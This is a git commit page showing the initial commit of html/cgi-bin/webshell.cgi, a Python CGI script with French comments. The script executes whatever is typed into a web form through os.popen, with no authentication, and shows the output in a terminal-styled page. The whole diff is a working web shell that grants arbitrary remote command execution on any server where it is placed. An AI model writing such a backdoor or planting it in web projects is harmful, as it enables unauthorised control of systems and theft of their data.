diff options
| author | jerome <jerome@xlinfo.fr> | 2023-12-18 00:02:09 +0100 |
|---|---|---|
| committer | jerome <jerome@xlinfo.fr> | 2023-12-18 00:02:09 +0100 |
| commit | a1203ccb343703ba5ae522254f75b6384a1831a7 (patch) | |
| tree | c54e1e6cf0da29170419b2fd9880ff6dcea28742 /html/cgi-bin/webshell.cgi | |
| download | python-a1203ccb343703ba5ae522254f75b6384a1831a7.tar.gz python-a1203ccb343703ba5ae522254f75b6384a1831a7.zip | |
depôt initial
Diffstat (limited to 'html/cgi-bin/webshell.cgi')
| -rwxr-xr-x | html/cgi-bin/webshell.cgi | 35 |
1 files changed, 35 insertions, 0 deletions
diff --git a/html/cgi-bin/webshell.cgi b/html/cgi-bin/webshell.cgi new file mode 100755 index 0000000..6598d37 --- /dev/null +++ b/html/cgi-bin/webshell.cgi @@ -0,0 +1,35 @@ +#!/usr/bin/env python3 + +# après avoir lancé le serveur : python3 -m http.server --cgi +# placer le script (rendu exécutable) dans /cgi-bin... + +import cgi +import os + +form = cgi.FieldStorage() +cmd = form.getvalue('command') +user = os.getlogin() +host = os.environ.get('SERVER_NAME') +pwd = os.environ.get('PWD') + +print("Content-Type: text/html; charset=UTF-8\n\n") +print (""" +<html> +<head> +<title>Web shell</title> +</head> +<body> +<h1>Web shell</h1> +<p>Entrez votre commande : </p> +<form action=''> +<input type='text' name='command' id='command' /> +<input type='submit' value='submit' /> +</form>""") +if cmd : + print("<pre style='display:inline-block;min-width:50em;padding:1em;background-color:black;color:white'>") + print(f"{user}@{host}:{pwd}$ {cmd}\n{os.popen(cmd).read()}") + print("</pre>") +print(""" +<script>document.getElementById("command").focus()</script> +</body> +</html>""") |